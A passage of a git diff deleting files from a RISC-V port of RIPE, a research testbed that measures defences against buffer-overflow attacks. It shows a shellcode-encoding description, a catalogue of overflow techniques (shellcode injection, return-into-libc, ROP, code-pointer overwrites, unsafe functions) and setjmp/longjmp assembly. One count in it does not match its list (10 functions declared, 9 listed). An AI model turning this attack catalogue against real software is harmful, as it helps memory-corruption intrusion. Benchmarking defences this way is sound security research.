the following encodings: - -LUI: xxxx xxxx xxxx xxxx xxxx xxxx x011 0111 - \ / \ /\ / - imm value reg# opcode - - -ADDI: xxxx xxxx xxxx xxxx x000 xxxx x011 0011 - \ / \ / \ /\ / - imm value reg# reg# opcode - - -JALR: 0000 0000 0000 xxxx x000 0000 1110 0111 - \ / \ / - reg# opcode - -The shellcode is formatted so that: - 1. All instructions are stored to a single string - 1. Byte order is converted to little-endian -*/ -void build_shellcode(char *shellcode); -void hex_to_string(char *str, size_t val); -void format_instruction(char *dest, size_t insn); - -const char *hex_to_bin(char c) { - if (c >= '0' && c <= '9') return bin4b[c - '0']; - if (c >= 'a' && c <= 'f') return bin4b[10 + c - 'a']; - return NULL; -} - -#endif /* !RIPE_ATTACK_GENERATOR_H */ diff --git a/zephyr-docker/workspace/ripe/src/ripe_attack_parameters.h b/zephyr-docker/workspace/ripe/src/ripe_attack_parameters.h deleted file mode 100644 index 54d695079..000000000 --- a/zephyr-docker/workspace/ripe/src/ripe_attack_parameters.h +++ /dev/null @@ -1,70 +0,0 @@ -/* RIPE was originally developed by John Wilander (@johnwilander) - * and was debugged and extended by Nick Nikiforakis (@nicknikiforakis) - * - * RISC-V port developed by John Merrill - * - * Released under the MIT license (see file named LICENSE) - * - * This program is part the paper titled - * RIPE: Runtime Intrusion Prevention Evaluator - * Authored by: John Wilander, Nick Nikiforakis, Yves Younan, - * Mariam Kamkar and Wouter Joosen - * Published in the proceedings of ACSAC 2011, Orlando, Florida - * - * Please cite accordingly. - */ - -/** - * @author John Wilander - * 2007-01-16 - */ - -#ifndef RIPE_ATTACK_PARAMETERS_H -#define RIPE_ATTACK_PARAMETERS_H - -#define ATTACK_IMPOSSIBLE -900 -#define ATTACK_NOT_IMPLEMENTED -909 - -/* Enumerations for typing of attack form parameters */ -/* Each enumeration has its own integer space to provide better type safety */ -enum techniques {DIRECT=100, INDIRECT}; -enum inject_params {INJECTED_CODE_NO_NOP=200, RETURN_INTO_LIBC, - RETURN_ORIENTED_PROGRAMMING, DATA_ONLY}; - -enum code_ptrs {RET_ADDR=300, FUNC_PTR_STACK_VAR, FUNC_PTR_STACK_PARAM, - FUNC_PTR_HEAP, FUNC_PTR_BSS, FUNC_PTR_DATA, - LONGJMP_BUF_STACK_VAR, LONGJMP_BUF_STACK_PARAM, - LONGJMP_BUF_HEAP, LONGJMP_BUF_BSS, LONGJMP_BUF_DATA, - STRUCT_FUNC_PTR_STACK,STRUCT_FUNC_PTR_HEAP, - STRUCT_FUNC_PTR_DATA,STRUCT_FUNC_PTR_BSS, VAR_BOF, VAR_IOF, VAR_LEAK}; -enum locations {STACK=400, HEAP, BSS, DATA}; -enum functions {MEMCPY=500, STRCPY, STRNCPY, SPRINTF, SNPRINTF, - STRCAT, STRNCAT, SSCANF, HOMEBREW}; - -/* 2 overflow techniques */ -size_t nr_of_techniques = 2; -char *opt_techniques[] = {"direct", "indirect"}; - -/* 4 types of injection parameters */ -size_t nr_of_inject_params = 4; -char *opt_inject_params[] = {"shellcode", "returnintolibc", "rop", "dataonly"}; - -/* 18 code pointers to overwrite */ -size_t nr_of_code_ptrs = 18; -char *opt_code_ptrs[] = {"ret", "funcptrstackvar", "funcptrstackparam", - "funcptrheap", "funcptrbss", "funcptrdata", - "longjmpstackvar", "longjmpstackparam", - "longjmpheap", "longjmpbss", "longjmpdata", - "structfuncptrstack","structfuncptrheap", - "structfuncptrdata","structfuncptrbss", "bof", "iof", "leak"}; - -/* 4 memory locations */ -size_t nr_of_locations = 4; -char *opt_locations[] = {"stack", "heap", "bss", "data"}; - -/* 9 vulnerable functions */ -size_t nr_of_funcs = 10; -char *opt_funcs[] = {"memcpy", "strcpy", "strncpy", "sprintf", "snprintf", - "strcat", "strncat", "sscanf", "homebrew"}; - -#endif /* !RIPE_ATTACK_PARAMETERS_H */ diff --git a/zephyr-docker/workspace/ripe/src/setjmp.S b/zephyr-docker/workspace/ripe/src/setjmp.S deleted file mode 100644 index 7a1466adc..000000000 --- a/zephyr-docker/workspace/ripe/src/setjmp.S +++ /dev/null @@ -1,63 +0,0 @@ -/* - * (C) 2018 Alexander Graf - * - * SPDX-License-Identifier: GPL-2.0+ - */ - -#ifdef CONFIG_CPU_RISCV_64 -#define STORE_IDX(reg, idx) sd reg, (idx*8)(a0) -#define LOAD_IDX(reg, idx) ld reg, (idx*8)(a0) -#else -#define STORE_IDX(reg, idx) sw reg, (idx*4)(a0) -#define LOAD_IDX(reg, idx) lw reg, (idx*4)(a0) -#endif - -#include - -/* exports */ -GTEXT(setjmp) -GTEXT(longjmp) - -SECTION_FUNC(TEXT, setjmp) - /* Preserve all callee-saved registers and the SP */ - STORE_IDX(s0, 0) - STORE_IDX(s1, 1) - STORE_IDX(s2, 2) - STORE_IDX(s3, 3) - STORE_IDX(s4, 4) - STORE_IDX(s5, 5) - STORE_IDX(s6, 6) - STORE_IDX(s7, 7) - STORE_IDX(s8, 8) - STORE_IDX(s9, 9) - STORE_IDX(s10, 10) - STORE_IDX(s11, 11) - STORE_IDX(ra, 12) - STORE_IDX(sp, 13) - li a0, 0 - ret - -SECTION_FUNC(TEXT, longjmp) - LOAD_IDX(s0, 0) - LOAD_IDX(s1, 1) - LOAD_IDX(s2, 2) - LOAD_IDX(s3, 3) - LOAD_IDX(s4, 4) - LOAD_IDX(s5, 5) - LOAD_IDX(s6, 6) - LOAD_IDX(s7, 7) - LOAD_IDX(s8, 8) - LOAD_IDX(s9, 9) - LOAD_IDX(s10, 10) - LOAD_IDX(s11, 11) - LOAD_IDX(ra, 12) - LOAD_IDX(sp, 13) - - /* Move the return value in place, but return 1 if passed 0. */ - beq a1, zero, longjmp_1 - mv a0, a1 - ret - - longjmp_1: - li a0, 1 - ret diff --git a/zephyr-docker/workspace/ripe/src/setjmp.h b/zephyr-docker/workspace/ripe/src/setjmp.h deleted file mode 100644 index 01ad6d081..000000000 --- a/zephyr-docker/workspace/ripe/src/setjmp.h +++ /dev/null @@ -1,26 +0,0 @@ -/* - * (C) Copyright 2018 Alexander Graf - * - * SPDX-License-Identifier: GPL-2.0+ - */ - -#ifndef _SETJMP_H_ -#define _SETJMP_H_ 1 - -/* - * This really should be opaque, but the EFI implementation wrongly - * assumes that a 'struct jmp_buf_data' is defined. - */ -struct jmp_buf_data { - /* x2, x8, x9, x18, x19, x20, x21, x22, x23, x24, x25, x26, x27, sp */ - unsigned long s_regs[12]; /* s0 - s11 */ - unsigned long ra; - unsigned long sp; -}; - -typedef struct jmp_buf_data jmp_buf[1]; - -int setjmp(jmp_buf jmp); -void longjmp(jmp_buf jmp, int ret); - -#endif /* _SETJMP_H_ */